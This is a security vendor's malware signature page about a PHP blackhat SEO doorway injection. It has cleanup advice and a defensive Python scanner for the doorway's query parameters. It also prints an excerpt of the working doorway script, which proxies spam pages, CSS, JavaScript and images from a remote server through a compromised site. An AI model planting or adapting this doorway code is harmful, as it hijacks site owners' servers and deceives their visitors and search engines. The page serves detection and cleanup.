Malware Signatures

php.spam-seo.remote_dor_content.001

Blackhat SEO is a malicious technique used to manipulate search engine results in order to benefit a website in terms of relevance. The payload is PHP based, so it is intended for server-side use and is executed directly on the server while the site is loaded. Only the payload result (such as a malicious iframe or redirect) is visible in the browser, not the malicious code itself.

One of the "Remote doorway content" injection attacks uses a doorway script that fetches spammy pages from a third-party server, an .htaccess file with rewrite rules that invoke the doorway script for specific URL patterns, and a backdoor (a variation of the Filesman) with some additional functions that make it possible to inject spam into WordPress posts and generate the above-mentioned .htaccess and doorway scripts.

The doorway fetches spammy content from a spammy site (usually a counterfeit online pharmacy) on the fly. To remove references to resources on that third-party site, all images and CSS resources are also loaded via this script.

Affecting

Any site on a server with PHP and enabled modules and functions that can download content from remote servers, e.g. file_get_contents, curl, etc. WordPress sites may be specifically targeted by this attack.

Cleanup

In this case you need to find the .htaccess file with malicious rewrite rules (it usually contains keywords like ximg, pand). This file will point at the doorway script that you need to delete. Then scan your server for backdoors.
You can sign up with us and let our team remove the malware for you.
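
The search described above as a read-only scan, given as an added example that is not part of the original page: it lists .htaccess RewriteRule lines that mention the doorway's query parameters (pand, xcss, xjs, ximg, taken from the dump below) and PHP files that read two or more of them and also fetch remote content. The sample tree, its rewrite rules and the file name cache.php are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Query parameters handled by the doorway in the dump on this page.
PARAMS = "pand|xcss|xjs|ximg"
MARKER_RE = re.compile(rf"\b({PARAMS})\b")
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)  # captures the substitution
GET_RE = re.compile(rf"""\$_GET\[\s*["']({PARAMS})["']\s*\]""")
FETCH_RE = re.compile(r"curl_exec|file_get_contents")


def scan_webroot(root):
    """Return (rewrite-rule hits, doorway-like PHP files) under root, read-only."""
    root = Path(root)
    rules, scripts = [], []
    for ht in sorted(root.rglob(".htaccess")):
        for num, line in enumerate(ht.read_text(errors="replace").splitlines(), 1):
            m = RULE_RE.match(line)
            if m and MARKER_RE.search(line):
                # Script the rule hands the request to, without its query string.
                target = m.group(1).split("?", 1)[0]
                rules.append((ht.relative_to(root).as_posix(), num, target))
    for php in sorted(root.rglob("*.php")):
        text = php.read_text(errors="replace")
        # Two or more doorway parameters plus a remote fetch: flag for review.
        if len(set(GET_RE.findall(text))) >= 2 and FETCH_RE.search(text):
            scripts.append(php.relative_to(root).as_posix())
    return rules, scripts


def make_sample(root):
    """Constructed sample tree; the rules and the name cache.php are made up."""
    blog = Path(root) / "blog"
    blog.mkdir()
    (Path(root) / ".htaccess").write_text("RewriteRule ^old$ /new [R=301,L]\n")
    (blog / ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteRule ^pand/(.*)$ cache.php?pand=$1 [L]\n"
        "RewriteRule ^ximg/(.*)\\.(\\w+)$ cache.php?ximg=$1&ext=$2 [L]\n")
    (blog / "cache.php").write_text(  # inert marker strings only
        '<?php if (isset($_GET["pand"])) { $r = curl_exec($ch); }\n'
        'if (isset($_GET["ximg"])) { $r = curl_exec($ch); }\n')


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_sample(tmp)
        print(scan_webroot(tmp))
```

The rewrite target is reported as written in the rule, so resolve it relative to the directory of the .htaccess file that contains it. A hit is a lead for manual review, not proof of infection.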

Dump

... excerpts ....

$dor_dir = "http://xxx.xx.xx.xxx/redbutton/main2-dors/01a-040-3/";
function get_content2($URL){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $URL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
    if (isset($_SERVER["HTTP_REFERER"])) {
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
    }
    $result = curl_exec($ch);
    if ( strpos($result, "Moved Permanently") !== false ) {
        $r_url = preg_replace("/^.*hrefs*=s*["']([^"'>]+?)(["'>]+).*/is","$1",$result);
        header("Location: " . $r_url);
        exit;
    }
    curl_close($ch);
    return $result;
}
if (isset($_GET["pand"])){
    $page_to_get=$_GET["pand"];
    $dir=substr($page_to_get,strrpos($page_to_get,'/') + 1);
    $ext=substr($page_to_get,strrpos($page_to_get,'.') + 1);
    if($ext=='html'){}
    elseif($dir=='index'){
        $page_to_get=$page_to_get.".html";
    }
    else{
        $page_to_get=$page_to_get."/index.html";
    }
    $dor_way=$dor_dir.$page_to_get;
    $dor_content=get_content2($dor_way);
    $dor_content=preg_replace("#(<s*as+[^>]*hrefs*=s*["'])(?!http)([^"'>]+)(.html)(["'>]+)#","$1" . "/pand/" . "$2" . "$4", $dor_content);
    $dor_content=preg_replace("#(<s*?links+[^>]*.*?hrefs*=s*["'])(.*?)(.css)(["'].*?>)#","$1".$_SERVER["SCRIPT_NAME"]."?xcss="."$2"."$4",$dor_content);
    $dor_content=preg_replace("#(<s*?scripts+[^>]*.*?srcs*=s*["'])(.*?)(.js)(["'].*?>)#","$1".$_SERVER["SCRIPT_NAME"]."?xjs="."$2"."$4",$dor_content);
    echo $dor_content;die();
}
if(isset($_GET["xcss"])){
    $page_to_get=$_GET["xcss"];
    $dor_way=$dor_dir.$page_to_get.".css";
    header("Content-Type:text/css");
    $css_content=get_content2($dor_way);
    echo$css_content;
    die();
}
if (isset($_GET["xjs"])){
    $page_to_get=$_GET["xjs"];
    $dor_way=$dor_dir.$page_to_get.".js";
    header("Content-Type:text/javascript");
    $css_content=get_content2($dor_way);
    echo$css_content;
    die();
}
if (isset($_GET["ximg"])) {
    $page_to_get=$_GET["ximg"];
    $ext_to_get=".".$_GET["ext"];
    $dor_way =$dor_dir."images/".$page_to_get.$ext_to_get;
    if (strpos($ext_to_get, "gif")>0) {
        header("Content-Type: image/gif");
    }
    if (strpos($ext_to_get, "jpg")>0) {
        header("Content-Type: image/jpeg");
    }
    if (strpos($ext_to_get, "jpeg")>0) {
        header("Content-Type: image/jpeg");
    }
    if (strpos($ext_to_get, "png")>0){
        header("Content-Type: image/png");
    }
    $css_content=get_content2($dor_way);
    echo $css_content;
    die();
}
...